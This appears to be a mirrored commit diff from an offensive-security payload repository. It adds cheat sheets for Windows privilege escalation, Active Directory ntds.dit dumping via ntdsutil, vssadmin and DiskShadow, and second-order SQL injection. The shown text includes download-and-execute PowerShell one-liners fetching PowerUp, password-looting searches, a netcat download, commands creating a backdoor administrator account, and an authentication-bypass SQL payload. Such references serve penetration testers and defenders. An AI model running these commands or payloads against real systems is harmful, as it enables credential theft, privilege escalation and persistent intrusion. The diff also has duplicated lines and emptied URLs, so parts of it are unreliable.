mirror of
synced 2025-03-04 23:37:35 +00:00
Windows PrivEsc + SQLi second order + AD DiskShadow
This commit is contained in:
6 changed files with 215 additions and 17 deletions
@ -39,6 +39,7 @@ crackmapexec -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M met
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks"
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('');"
* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
## Most common paths to AD compromise
@ -82,36 +83,59 @@ Get-NetGPOGroup
### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
**Using ndtsutil**
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
**Using Vshadow**
vssadmin create shadow /for=C :
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
**Using DiskShadow (a Windows signed binary)**
diskshadow.txt contains :
set context persistent nowriters
add volume c: alias someAlias
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
diskshadow.exe /s c:\diskshadow.txt
dir c:\exfil
reg.exe save hklm\system c:\exfil\system.bak
**Extract hashes from ntds.dit**
then you need to use secretsdump to extract the hashes
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
Metasploit module
**Alternatives - modules**
Metasploit modules
PowerSploit module
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
### Golden Tickets
Forge a TGT, require krbtgt key
@ -267,4 +291,5 @@ net group "Domain Admins" hacker2 /add /domain
* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
Methodology and Resources/Windows - Privilege Escalation.md
Normal file
Methodology and Resources/Windows - Privilege Escalation.md
Normal file
@ -0,0 +1,157 @@
# Windows - Privilege Escalation
Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/)
## Windows Version and Configuration
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
List all env variables
List all drives
wmic logicaldisk get caption || fsutil fsinfo drives
## User Enumeration
Get current username
echo %USERNAME% || whoami
List all users
net user
whoami /all
List logon requirements; useable for bruteforcing
net accounts
Get details about a user (i.e. administrator, admin, current user)
net user administrator
net user admin
net user %USERNAME%
List all local groups
net localgroup
Get details about a group (i.e. administrators)
net localgroup administrators
## Network Enumeration
List all network interfaces
ipconfig /all
List current routing table
route print
List the ARP table
arp -A
List all current connections
netstat -ano
List firware state and current configuration
netsh advfirewall firewall dump
List all network shares
net share
## Looting for passwords
Search for file contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
Search for a file with a certain filename
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
Search the registry for key names
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
Read a value of a certain sub key
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
## Processes Enum
What processes are running?
tasklist /v
Which processes are running as "system"
tasklist /v /fi "username eq system"
Do you have powershell magic?
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
## Uploading / Downloading files
a wget using powershell
powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"
wget using bitsadmin (when powershell is not present)
cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"
now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe
## Spot the weak service using PowerSploit's PowerUP
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
## Thanks to
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
@ -1,9 +1,14 @@
# Windows - Using credentials
Little tip, if you don't have credentials yet :D
net user hacker hacker /add
net localgroup administrators hacker /add
Some info about your user
net user /dom
net user /domain
## Metasploit - SMB
@ -1,6 +1,6 @@
## PostgreSQL Comment
## PostgreSQL Comments
@ -2,13 +2,19 @@
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
## Summary
* [Entry point detection](#)
* [DBMS Identification](#)
* [SQL injection using SQLmap](#)
* [Authentication bypass](#)
* [Polyglot injection](#)
* [Insert Statement - ON DUPLICATE KEY UPDATE](#)
* [WAF Bypass](#)
* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MSSQL%20Injection.md)
* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)
* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md)
* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md)
* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md)
* [Entry point detection](#entry-point-detection)
* [DBMS Identification](#dbms-identification)
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
* [Authentication bypass](#authentication-bypass)
* [Polyglot injection](#polyglot-injection-multicontext)
* [Second order injection](#second-order-injection)
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
* [WAF Bypass](#waf-bypass)
## Entry point detection
@ -275,6 +281,11 @@ admin") or "1"="1"/*
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
## Second order injection
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
## Insert Statement - ON DUPLICATE KEY UPDATE
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
@ -392,7 +403,7 @@ mysql> mysql> select version();
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
- [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
- [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
@ -1,6 +1,6 @@
# SQLite Injection
## SQLite comment
## SQLite comments
Add table
Reference in a new issue